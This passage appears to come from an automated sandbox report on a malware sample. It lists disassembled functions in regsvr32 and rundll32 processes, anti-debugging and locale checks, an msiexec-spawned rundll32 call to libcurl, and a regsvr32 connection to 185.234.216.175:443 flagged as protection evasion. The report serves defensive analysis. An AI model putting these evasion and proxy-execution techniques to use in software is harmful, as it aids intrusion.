                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F837D90 mov ecx, dword ptr fs:[00000030h]7_2_7F837D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F837D90 mov edx, dword ptr fs:[00000030h]7_2_7F837D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F837D90 mov eax, dword ptr fs:[00000030h]7_2_7F837D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F837D90 mov ecx, dword ptr fs:[00000030h]7_2_7F837D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82ADB0 mov edx, dword ptr fs:[00000030h]7_2_7F82ADB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F815CD0 mov ecx, dword ptr fs:[00000030h]7_2_7F815CD0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F806C70 mov edx, dword ptr fs:[00000030h]7_2_7F806C70
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F829A90 mov eax, dword ptr fs:[00000030h]7_2_7F829A90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F857A0D mov eax, dword ptr fs:[00000030h]7_2_7F857A0D
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80DA10 mov edx, dword ptr fs:[00000030h]7_2_7F80DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80DA10 mov eax, dword ptr fs:[00000030h]7_2_7F80DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F812A20 mov eax, dword ptr fs:[00000030h]7_2_7F812A20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F857998 mov eax, dword ptr fs:[00000030h]7_2_7F857998
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8579DC mov eax, dword ptr fs:[00000030h]7_2_7F8579DC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov ecx, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov ecx, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A800 mov eax, dword ptr fs:[00000030h]7_2_7F81A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F838870 mov ecx, dword ptr fs:[00000030h]7_2_7F838870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F838870 mov edx, dword ptr fs:[00000030h]7_2_7F838870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F838870 mov eax, dword ptr fs:[00000030h]7_2_7F838870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F838870 mov ecx, dword ptr fs:[00000030h]7_2_7F838870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F819790 mov eax, dword ptr fs:[00000030h]7_2_7F819790
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8507C8 mov ecx, dword ptr fs:[00000030h]7_2_7F8507C8
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8047D4 mov ecx, dword ptr fs:[00000030h]7_2_7F8047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8047D4 mov ecx, dword ptr fs:[00000030h]7_2_7F8047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8047D4 mov edx, dword ptr fs:[00000030h]7_2_7F8047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82E690 mov ecx, dword ptr fs:[00000030h]7_2_7F82E690
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80D6C0 mov edx, dword ptr fs:[00000030h]7_2_7F80D6C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F83F610 mov eax, dword ptr fs:[00000030h]7_2_7F83F610
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F827660 mov ecx, dword ptr fs:[00000030h]7_2_7F827660
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81966C mov eax, dword ptr fs:[00000030h]7_2_7F81966C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81966C mov edx, dword ptr fs:[00000030h]7_2_7F81966C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81966C mov ecx, dword ptr fs:[00000030h]7_2_7F81966C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81966C mov ecx, dword ptr fs:[00000030h]7_2_7F81966C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81966C mov ecx, dword ptr fs:[00000030h]7_2_7F81966C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81966C mov edx, dword ptr fs:[00000030h]7_2_7F81966C
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80E5A0 mov eax, dword ptr fs:[00000030h]7_2_7F80E5A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82A560 mov ecx, dword ptr fs:[00000030h]7_2_7F82A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82A560 mov eax, dword ptr fs:[00000030h]7_2_7F82A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82A560 mov ecx, dword ptr fs:[00000030h]7_2_7F82A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F812420 mov edx, dword ptr fs:[00000030h]7_2_7F812420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F812420 mov eax, dword ptr fs:[00000030h]7_2_7F812420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F814392 mov edx, dword ptr fs:[00000030h]7_2_7F814392
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82E3A0 mov eax, dword ptr fs:[00000030h]7_2_7F82E3A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82D3E0 mov ecx, dword ptr fs:[00000030h]7_2_7F82D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82D3E0 mov eax, dword ptr fs:[00000030h]7_2_7F82D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82D3E0 mov ecx, dword ptr fs:[00000030h]7_2_7F82D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82D3E0 mov edx, dword ptr fs:[00000030h]7_2_7F82D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82D3E0 mov eax, dword ptr fs:[00000030h]7_2_7F82D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80D370 mov edx, dword ptr fs:[00000030h]7_2_7F80D370
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F804280 mov edx, dword ptr fs:[00000030h]7_2_7F804280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]7_2_7F804280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]7_2_7F804280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]7_2_7F804280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F804280 mov ecx, dword ptr fs:[00000030h]7_2_7F804280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F804280 mov edx, dword ptr fs:[00000030h]7_2_7F804280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8072D0 mov edx, dword ptr fs:[00000030h]7_2_7F8072D0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8042E4 mov edx, dword ptr fs:[00000030h]7_2_7F8042E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8042E4 mov ecx, dword ptr fs:[00000030h]7_2_7F8042E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F80E250 mov edx, dword ptr fs:[00000030h]7_2_7F80E250
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82B260 mov ecx, dword ptr fs:[00000030h]7_2_7F82B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82B260 mov eax, dword ptr fs:[00000030h]7_2_7F82B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82B260 mov edx, dword ptr fs:[00000030h]7_2_7F82B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82B260 mov eax, dword ptr fs:[00000030h]7_2_7F82B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82B260 mov ecx, dword ptr fs:[00000030h]7_2_7F82B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82E1B0 mov eax, dword ptr fs:[00000030h]7_2_7F82E1B0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82E1C0 mov edx, dword ptr fs:[00000030h]7_2_7F82E1C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov edx, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov ecx, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov edx, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81C160 mov eax, dword ptr fs:[00000030h]7_2_7F81C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82C170 mov eax, dword ptr fs:[00000030h]7_2_7F82C170
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A0A4 mov ecx, dword ptr fs:[00000030h]7_2_7F81A0A4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F81A0A4 mov edx, dword ptr fs:[00000030h]7_2_7F81A0A4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F133740 mov ecx, dword ptr fs:[00000030h]11_2_7F133740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F133740 mov ecx, dword ptr fs:[00000030h]11_2_7F133740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F133740 mov eax, dword ptr fs:[00000030h]11_2_7F133740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F133740 mov edx, dword ptr fs:[00000030h]11_2_7F133740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F126F1A mov eax, dword ptr fs:[00000030h]11_2_7F126F1A
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F128F30 mov edx, dword ptr fs:[00000030h]11_2_7F128F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F128F30 mov ecx, dword ptr fs:[00000030h]11_2_7F128F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F128F30 mov ecx, dword ptr fs:[00000030h]11_2_7F128F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14AF60 mov eax, dword ptr fs:[00000030h]11_2_7F14AF60
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F126E80 mov eax, dword ptr fs:[00000030h]11_2_7F126E80
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov edx, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov ecx, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov edx, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F141EB0 mov eax, dword ptr fs:[00000030h]11_2_7F141EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F145EC0 mov ecx, dword ptr fs:[00000030h]11_2_7F145EC0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F157D90 mov ecx, dword ptr fs:[00000030h]11_2_7F157D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F157D90 mov edx, dword ptr fs:[00000030h]11_2_7F157D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F157D90 mov eax, dword ptr fs:[00000030h]11_2_7F157D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F157D90 mov ecx, dword ptr fs:[00000030h]11_2_7F157D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14ADB0 mov edx, dword ptr fs:[00000030h]11_2_7F14ADB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F126C70 mov edx, dword ptr fs:[00000030h]11_2_7F126C70
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F135CD0 mov ecx, dword ptr fs:[00000030h]11_2_7F135CD0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12DA10 mov edx, dword ptr fs:[00000030h]11_2_7F12DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12DA10 mov eax, dword ptr fs:[00000030h]11_2_7F12DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F177A0D mov eax, dword ptr fs:[00000030h]11_2_7F177A0D
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F132A20 mov eax, dword ptr fs:[00000030h]11_2_7F132A20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F149A90 mov eax, dword ptr fs:[00000030h]11_2_7F149A90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F177998 mov eax, dword ptr fs:[00000030h]11_2_7F177998
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1779DC mov eax, dword ptr fs:[00000030h]11_2_7F1779DC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov ecx, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov ecx, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13A800 mov eax, dword ptr fs:[00000030h]11_2_7F13A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F158870 mov ecx, dword ptr fs:[00000030h]11_2_7F158870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F158870 mov edx, dword ptr fs:[00000030h]11_2_7F158870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F158870 mov eax, dword ptr fs:[00000030h]11_2_7F158870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F158870 mov ecx, dword ptr fs:[00000030h]11_2_7F158870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1247D4 mov ecx, dword ptr fs:[00000030h]11_2_7F1247D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1247D4 mov ecx, dword ptr fs:[00000030h]11_2_7F1247D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1247D4 mov edx, dword ptr fs:[00000030h]11_2_7F1247D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1707C8 mov ecx, dword ptr fs:[00000030h]11_2_7F1707C8
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F15F610 mov eax, dword ptr fs:[00000030h]11_2_7F15F610
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F147660 mov ecx, dword ptr fs:[00000030h]11_2_7F147660
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14E690 mov ecx, dword ptr fs:[00000030h]11_2_7F14E690
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12D6C0 mov edx, dword ptr fs:[00000030h]11_2_7F12D6C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14A560 mov ecx, dword ptr fs:[00000030h]11_2_7F14A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14A560 mov eax, dword ptr fs:[00000030h]11_2_7F14A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14A560 mov ecx, dword ptr fs:[00000030h]11_2_7F14A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12E5A0 mov eax, dword ptr fs:[00000030h]11_2_7F12E5A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F132420 mov edx, dword ptr fs:[00000030h]11_2_7F132420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F132420 mov eax, dword ptr fs:[00000030h]11_2_7F132420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12D370 mov edx, dword ptr fs:[00000030h]11_2_7F12D370
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F134392 mov edx, dword ptr fs:[00000030h]11_2_7F134392
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14E3A0 mov eax, dword ptr fs:[00000030h]11_2_7F14E3A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14D3E0 mov ecx, dword ptr fs:[00000030h]11_2_7F14D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14D3E0 mov eax, dword ptr fs:[00000030h]11_2_7F14D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14D3E0 mov ecx, dword ptr fs:[00000030h]11_2_7F14D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14D3E0 mov edx, dword ptr fs:[00000030h]11_2_7F14D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14D3E0 mov eax, dword ptr fs:[00000030h]11_2_7F14D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F12E250 mov edx, dword ptr fs:[00000030h]11_2_7F12E250
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14B260 mov ecx, dword ptr fs:[00000030h]11_2_7F14B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14B260 mov eax, dword ptr fs:[00000030h]11_2_7F14B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14B260 mov edx, dword ptr fs:[00000030h]11_2_7F14B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14B260 mov eax, dword ptr fs:[00000030h]11_2_7F14B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14B260 mov ecx, dword ptr fs:[00000030h]11_2_7F14B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F124280 mov edx, dword ptr fs:[00000030h]11_2_7F124280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]11_2_7F124280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]11_2_7F124280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]11_2_7F124280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F124280 mov ecx, dword ptr fs:[00000030h]11_2_7F124280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F124280 mov edx, dword ptr fs:[00000030h]11_2_7F124280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1272D0 mov edx, dword ptr fs:[00000030h]11_2_7F1272D0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1242E4 mov edx, dword ptr fs:[00000030h]11_2_7F1242E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1242E4 mov ecx, dword ptr fs:[00000030h]11_2_7F1242E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14C170 mov eax, dword ptr fs:[00000030h]11_2_7F14C170
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov edx, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov ecx, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov edx, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F13C160 mov eax, dword ptr fs:[00000030h]11_2_7F13C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14E1B0 mov eax, dword ptr fs:[00000030h]11_2_7F14E1B0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F14E1C0 mov edx, dword ptr fs:[00000030h]11_2_7F14E1C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB295F0 GetProcessHeap,GetDriveTypeA,5_2_7FB295F0
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_initJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6C33F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C33F233
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB41665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_7FB41665
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB41417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FB41417
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB452A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FB452A3
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6B62F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6B62F233
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F841665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_7F841665
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F841417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_7F841417
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F8452A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_7F8452A3
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F161665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_7F161665
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F161417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_7F161417
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7F1652A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_7F1652A3

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.234.216.175 443Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB411CC cpuid 5_2_7FB411CC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FB53E2F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_7FB5AC51
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FB5AB82
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_7FB5AA7C
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,5_2_7FB5A953
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_7FB5A700
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FB5A675
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FB5A58F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,5_2_7FB5A5DA
